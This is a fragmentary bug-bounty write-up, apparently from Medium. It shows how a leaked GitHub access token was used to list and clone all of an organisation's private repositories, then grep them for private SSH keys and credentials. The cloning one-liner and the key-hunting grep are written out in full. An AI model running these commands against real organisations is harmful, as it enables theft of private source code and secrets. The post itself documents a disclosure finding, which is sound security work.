Full structure takeover to many brands of company

Directory listing
Automatically expire after 30 days

Lets try to verify

https://api.github.com/orgs/<username>/repos?access_token=<token>
Access token is valid
curl https://api.github.com/orgs/<username>/repos?access_token=<token> | grep '\"name\"' | cut -d ":" -f 2 | cut -d '"' -f 2 > privare_repos_name.txtfor repo in $(cat privare_repos_name.txt); do git clone https://<access-token>@github.com/<username>/$repo; done
5.4G size of all repositories
5.4G !!!!!!
# Grep private ssh key command
grep -r -R '(?=[-]*(?=[A-Z]*(?=[-])))(.*)(?=[-]*(?=[A-Z]*(?=[-])))'
docker-compose.yml creds

Also Business impact

Keep following

--

--

--

Penetration tester | Bug Hunter

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Setting up GTX-1070 Passthrough with ESXi

Web Page Accessibility and How to Test it manually and through Test Automation

Learning Go — Variables

Should Your E-commerce Site Be Using AMP?

Using Rails as a RESTful API

Exception handling

Validations in ASP.NET Core

What type of news consumer are you? What we learned.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Abdelrahman Khaled

Abdelrahman Khaled

Penetration tester | Bug Hunter

More from Medium

“Previse — Hack_The_Box”

Leaked Database of CGG Website: GOVT- BUG (CRITICAL)

How did I find Log4j vulnerability via Static Code Analysis and receive €€€ bounty?

TryHackMe Writeup : Solar, exploiting Log4J🥷🏻🥷🏻